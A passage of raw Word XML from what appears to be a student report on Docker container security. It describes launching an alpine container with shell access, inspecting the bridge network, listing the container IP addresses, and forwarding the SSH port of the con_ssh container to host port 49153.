      <w:r w:rsidR="007E3246">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC0DFF">
        <w:t>Also, m</w:t>
      </w:r>
      <w:r w:rsidR="007E3246">
        <w:t xml:space="preserve">ost base images </w:t>
      </w:r>
      <w:r w:rsidR="00E06847">
        <w:t>came with</w:t>
      </w:r>
      <w:r w:rsidR="00381D41">
        <w:t xml:space="preserve"> minimal features</w:t>
      </w:r>
      <w:r w:rsidR="00C3755F">
        <w:t xml:space="preserve"> and packages.</w:t>
      </w:r>
      <w:r w:rsidR="001B54E8">
        <w:t xml:space="preserve"> Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="001B6719">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="001B54E8">
        <w:t xml:space="preserve">alpine image is used to </w:t>
      </w:r>
      <w:r w:rsidR="001008C1">
        <w:t>add and run the missing packages</w:t>
      </w:r>
      <w:r w:rsidR="00E96634">
        <w:t xml:space="preserve"> in the other </w:t>
      </w:r>
      <w:r w:rsidR="00DF690E">
        <w:t>two containers</w:t>
      </w:r>
      <w:r w:rsidR="00963D90">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DF690E">
        <w:t xml:space="preserve"> Thus</w:t>
      </w:r>
      <w:r w:rsidR="00D96A73">
        <w:t>, the attacker can</w:t>
      </w:r>
      <w:r w:rsidR="00C007B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A26D2B">
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="00C007B8">
        <w:t>the alpine container to</w:t>
      </w:r>
      <w:r w:rsidR="00D96A73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF139B">
        <w:t xml:space="preserve">add tools and gather </w:t>
      </w:r>
      <w:r w:rsidR="00473FF1">
        <w:t>accurate information</w:t>
      </w:r>
      <w:r w:rsidR="00905DC1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000E33E1">
        <w:t xml:space="preserve"> The alpine container is </w:t>
      </w:r>
      <w:r w:rsidR="0093496C">
        <w:t>launched using the commands shown in the figure be</w:t>
      </w:r>
      <w:r w:rsidR="00780AC7">
        <w:t>low.</w:t>
      </w:r>
      <w:r w:rsidR="009D0CE5">
        <w:t xml:space="preserve"> First</w:t>
      </w:r>
      <w:r w:rsidR="0043626D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009D0CE5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C543C">
        <w:t xml:space="preserve">the alpine image is pulled from the Docker Hub repository, and then </w:t>
      </w:r>
      <w:r w:rsidR="009C7C54">
        <w:t xml:space="preserve">an interactive container </w:t>
      </w:r>
      <w:r w:rsidR="0043626D">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="000E4DDC">
        <w:t xml:space="preserve">provides </w:t>
      </w:r>
      <w:r w:rsidR="004606EE">
        <w:t>access to the system shell</w:t>
      </w:r>
      <w:r w:rsidR="009E6C70">
        <w:t xml:space="preserve"> is created with the name apline1.</w:t>
      </w:r>
      <w:r w:rsidR="00B57CAF">
        <w:t xml:space="preserve"> As such,</w:t>
      </w:r>
      <w:r w:rsidR="00E87C8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B57CAF">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00E87C8C">
        <w:t xml:space="preserve">his will </w:t>
      </w:r>
      <w:r w:rsidR="001D74C7">
        <w:t xml:space="preserve">enable the </w:t>
      </w:r>
      <w:r w:rsidR="008A6EFF">
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidR="001D74C7">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00B764D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002063BA">
        <w:t xml:space="preserve">execute shell </w:t>
      </w:r>
      <w:r w:rsidR="00F52643">
        <w:t>commands</w:t>
      </w:r>
      <w:r w:rsidR="00090E5E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A79A2A0" w14:textId="36FE08C2" w:rsidR="007261F6" w:rsidRDefault="007261F6" w:rsidP="007261F6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="066A0819" wp14:editId="4D632CBD">
            <wp:extent cx="5026660" cy="1636395"/>
            <wp:effectExtent l="0" t="0" r="254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026660" cy="1636395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA2C4A8" w14:textId="35E33F77" w:rsidR="00C3247B" w:rsidRDefault="00C3247B" w:rsidP="00B34291">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc86858626"/>
      <w:bookmarkStart w:id="154" w:name="_Toc86867516"/>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B34291" w:rsidRPr="00B34291">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alpine container with access to the shell.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p w14:paraId="28EE2545" w14:textId="3ABAC911" w:rsidR="00B05DCF" w:rsidRPr="00B05DCF" w:rsidRDefault="00832093" w:rsidP="00B05DCF">
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:r w:rsidR="00A60525">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00536818">
        <w:t>the containers are tested and</w:t>
      </w:r>
      <w:r w:rsidR="00355691">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F64E50">
        <w:t xml:space="preserve">verified, as shown </w:t>
      </w:r>
      <w:r w:rsidR="006426B8">
        <w:t>in figure 36</w:t>
      </w:r>
      <w:r w:rsidR="00A169B5">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00955A5F">
        <w:t xml:space="preserve"> and they</w:t>
      </w:r>
      <w:r w:rsidR="004B006E">
        <w:t xml:space="preserve"> are running as expected.</w:t>
      </w:r>
      <w:r w:rsidR="0025093B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006950EE">
        <w:t xml:space="preserve">As it can </w:t>
      </w:r>
      <w:r w:rsidR="00213F91">
        <w:t>be seen, t</w:t>
      </w:r>
      <w:r w:rsidR="006D5CBD">
        <w:t xml:space="preserve">he SSH port </w:t>
      </w:r>
      <w:r w:rsidR="006567AA">
        <w:t xml:space="preserve">22 </w:t>
      </w:r>
      <w:r w:rsidR="006950EE">
        <w:t>of the con_ssh container is forw</w:t>
      </w:r>
      <w:r w:rsidR="00213F91">
        <w:t>arded to the host TCP port 49</w:t>
      </w:r>
      <w:r w:rsidR="006567AA">
        <w:t>153</w:t>
      </w:r>
      <w:r w:rsidR="00FB5C1D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF77D2" w14:textId="53540DB4" w:rsidR="00B05DCF" w:rsidRDefault="00B05DCF" w:rsidP="00B05DCF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40D93510" wp14:editId="1D4AE440">
            <wp:extent cx="5731510" cy="561975"/>
            <wp:effectExtent l="0" t="0" r="254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561975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9EA2B5" w14:textId="3CBCFD70" w:rsidR="00B777D4" w:rsidRPr="00364F37" w:rsidRDefault="00B777D4" w:rsidP="00364F37">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc86858627"/>
      <w:bookmarkStart w:id="156" w:name="_Toc86867517"/>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0025093B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>testing and checking the containers</w:t>
      </w:r>
      <w:r w:rsidR="00364F37" w:rsidRPr="00364F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
      <w:bookmarkEnd w:id="156"/>
    </w:p>
    <w:p w14:paraId="62314AC7" w14:textId="58D4FCC2" w:rsidR="00CF6B77" w:rsidRDefault="00C974BC" w:rsidP="007677A5">
      <w:r>
        <w:t xml:space="preserve">As discussed </w:t>
      </w:r>
      <w:r w:rsidR="000F5EE3">
        <w:t xml:space="preserve">previously, Docker containers </w:t>
      </w:r>
      <w:r w:rsidR="000F52B7">
        <w:t xml:space="preserve">run in their </w:t>
      </w:r>
      <w:r w:rsidR="005154ED">
        <w:t xml:space="preserve">virtual environment </w:t>
      </w:r>
      <w:r w:rsidR="0085649B">
        <w:t>wholly</w:t>
      </w:r>
      <w:r w:rsidR="005154ED">
        <w:t xml:space="preserve"> separated from the host</w:t>
      </w:r>
      <w:r w:rsidR="0034664E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0034664E">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0034664E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F37AF">
        <w:t>virtual machines (VM)</w:t>
      </w:r>
      <w:r w:rsidR="002454B5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00957F43">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00FD5A5B">
        <w:t xml:space="preserve">means </w:t>
      </w:r>
      <w:r w:rsidR="00FB7C6B">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="00E420B2">
        <w:t xml:space="preserve">have their </w:t>
      </w:r>
      <w:r w:rsidR="00132274">
        <w:t xml:space="preserve">own </w:t>
      </w:r>
      <w:r w:rsidR="004D7D40">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00450C76">
        <w:t>pace</w:t>
      </w:r>
      <w:r w:rsidR="0021092C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00450C76">
        <w:t xml:space="preserve"> containing networking, file system, and isolated processes</w:t>
      </w:r>
      <w:r w:rsidR="00B43E4A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0036585C">
        <w:t xml:space="preserve"> Docker uses its default bridge network </w:t>
      </w:r>
      <w:r w:rsidR="00573496">
        <w:t xml:space="preserve">system to </w:t>
      </w:r>
      <w:r w:rsidR="00A6168E">
        <w:t xml:space="preserve">connect containers, though </w:t>
      </w:r>
      <w:r w:rsidR="005E6D67">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00A6168E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00635C63">
        <w:t>offers</w:t>
      </w:r>
      <w:r w:rsidR="00A6168E">
        <w:t xml:space="preserve"> various </w:t>
      </w:r>
      <w:r w:rsidR="00690FCF">
        <w:t xml:space="preserve">other </w:t>
      </w:r>
      <w:r w:rsidR="00A6168E">
        <w:t>options</w:t>
      </w:r>
      <w:r w:rsidR="00690FCF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00706F6C">
        <w:t xml:space="preserve"> As for this project, </w:t>
      </w:r>
      <w:r w:rsidR="00706F6C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the containers </w:t>
      </w:r>
      <w:r w:rsidR="00F42C31">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="002D5C27">
        <w:t>shaped</w:t>
      </w:r>
      <w:r w:rsidR="00F42C31">
        <w:t xml:space="preserve"> to use the bridge network.</w:t>
      </w:r>
      <w:r w:rsidR="005A14F0">
        <w:t xml:space="preserve"> The three </w:t>
      </w:r>
      <w:r w:rsidR="00A34638">
        <w:t>containers are on the same Docker host</w:t>
      </w:r>
      <w:r w:rsidR="00217645">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006041BE">
        <w:t xml:space="preserve"> the Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="00C0111E">
        <w:t>laptop</w:t>
      </w:r>
      <w:r w:rsidR="005D172E">
        <w:t xml:space="preserve">; however, they are </w:t>
      </w:r>
      <w:r w:rsidR="009F1195">
        <w:t xml:space="preserve">completely isolated from </w:t>
      </w:r>
      <w:r w:rsidR="001B723B">
        <w:t>it.</w:t>
      </w:r>
      <w:r w:rsidR="004F17E7">
        <w:t xml:space="preserve"> Figure 37 </w:t>
      </w:r>
      <w:r w:rsidR="002139FA">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00766EDF">
        <w:t>a portion</w:t>
      </w:r>
      <w:r w:rsidR="002139FA">
        <w:t xml:space="preserve"> output of </w:t>
      </w:r>
      <w:r w:rsidR="00046F2B" w:rsidRPr="00046F2B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>docker network inspect bridge</w:t>
      </w:r>
      <w:r w:rsidR="00046F2B">
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
      <w:r w:rsidR="00E24740">
        <w:t xml:space="preserve"> As</w:t>
      </w:r>
      <w:r w:rsidR="003033FA">
        <w:t xml:space="preserve"> can be seen</w:t>
      </w:r>
      <w:r w:rsidR="00E24740">
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidR="007A10B7">
        <w:t>important points</w:t>
      </w:r>
      <w:r w:rsidR="001B5688">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D0DFC">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="006E53D2">
        <w:t xml:space="preserve">highlighted for </w:t>
      </w:r>
      <w:r w:rsidR="009F4734">
        <w:t>brevity.</w:t>
      </w:r>
      <w:r w:rsidR="002F00C4">
        <w:t xml:space="preserve"> The conta</w:t>
      </w:r>
      <w:r w:rsidR="00876DE4">
        <w:t xml:space="preserve">iners are assigned with default IP address </w:t>
      </w:r>
      <w:r w:rsidR="001B6F0F">
        <w:t>generated by the Docker engine</w:t>
      </w:r>
      <w:r w:rsidR="00F80B06">
        <w:t xml:space="preserve"> as the following list</w:t>
      </w:r>
      <w:r w:rsidR="00CF6B77">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB1B139" w14:textId="584E1211" w:rsidR="007677A5" w:rsidRDefault="001F5BA0" w:rsidP="00CF6B77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">172.17.0.2/16 </w:t>
      </w:r>
      <w:r w:rsidR="00500469">
        <w:t xml:space="preserve">to container </w:t>
      </w:r>
      <w:r>
        <w:t>con_ssh</w:t>
      </w:r>
      <w:r w:rsidR="00500469">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F27D1" w14:textId="4617FB1B" w:rsidR="001F5BA0" w:rsidRDefault="001F5BA0" w:rsidP="00CF6B77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>172.17.0.</w:t>
      </w:r>
      <w:r w:rsidR="00995CFB">
        <w:t xml:space="preserve">3/16 </w:t>
      </w:r>
      <w:r w:rsidR="00500469">
        <w:t>to container</w:t>
      </w:r>
      <w:r w:rsidR="00995CFB">
        <w:t xml:space="preserve"> con_nossh</w:t>
      </w:r>
      <w:r w:rsidR="00500469">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210907FD" w14:textId="136ADEAB" w:rsidR="00500469" w:rsidRDefault="00500469" w:rsidP="00CF6B77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">172.17.0.4/16 </w:t>
      </w:r>
      <w:r w:rsidR="0096250C">
        <w:t>to container alpine1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ECF781" w14:textId="77777777" w:rsidR="005922DC" w:rsidRPr="007677A5" w:rsidRDefault="005922DC" w:rsidP="005922DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="780"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51818CC6" w14:textId="4C1C4981" w:rsidR="00670407" w:rsidRDefault="00301749" w:rsidP="00301749">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55612558" wp14:editId="56B4E80D">
            <wp:extent cx="4743213" cy="3765550"/>
            <wp:effectExtent l="0" t="0" r="635"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750750" cy="3771534"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="743CB2A7" w14:textId="2DFB581D" w:rsidR="009447FA" w:rsidRDefault="009447FA" w:rsidP="002A13C8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_Toc86858628"/>
      <w:bookmarkStart w:id="158" w:name="_Toc86867518"/>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>37</w:t>
      </w:r>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="002A13C8" w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>output of Docker network inspect bridge.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w14:paraId="74770F14" w14:textId="348ED54D" w:rsidR="006B0351" w:rsidRPr="006B0351" w:rsidRDefault="00E1146A" w:rsidP="006B0351">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="006C1788">
        <w:t xml:space="preserve">command in figure 38 is used to obtain </w:t>
      </w:r>
      <w:r w:rsidR="001B1CFF">
        <w:t xml:space="preserve">and find the port </w:t>
      </w:r>
      <w:r w:rsidR="00313803">
        <w:t>forwar</w:t>
      </w:r>
      <w:r w:rsidR="001F50E8">
        <w:t>ded to</w:t>
      </w:r>
      <w:r w:rsidR="00E15838">
        <w:t xml:space="preserve"> the host machine</w:t>
      </w:r>
      <w:r w:rsidR="00F9474C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C72043">
        <w:t xml:space="preserve"> The result</w:t>
      </w:r>
      <w:r w:rsidR="00304394">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C72043">
        <w:t xml:space="preserve"> show that port 22 of container con_ssh is for</w:t>
      </w:r>
      <w:r w:rsidR="00C00167">
        <w:t>warded to the host TCP port 49153.</w:t>
      </w:r>
      <w:r w:rsidR="002606E1">
        <w:t xml:space="preserve"> This means that </w:t>
      </w:r>
      <w:r w:rsidR="00D20B43">
        <w:t>any external host can access the container through t</w:t>
      </w:r>
      <w:r w:rsidR="00B948A3">
        <w:t>he host port 49153.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC5C470" w14:textId="2DE0BE73" w:rsidR="006B7087" w:rsidRDefault="006B0351" w:rsidP="006B0351">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="602D2364" wp14:editId="66E3E390">
            <wp:extent cx="3803650" cy="742950"/>
            <wp:effectExtent l="0" t="0" r="635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03650" cy="742950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
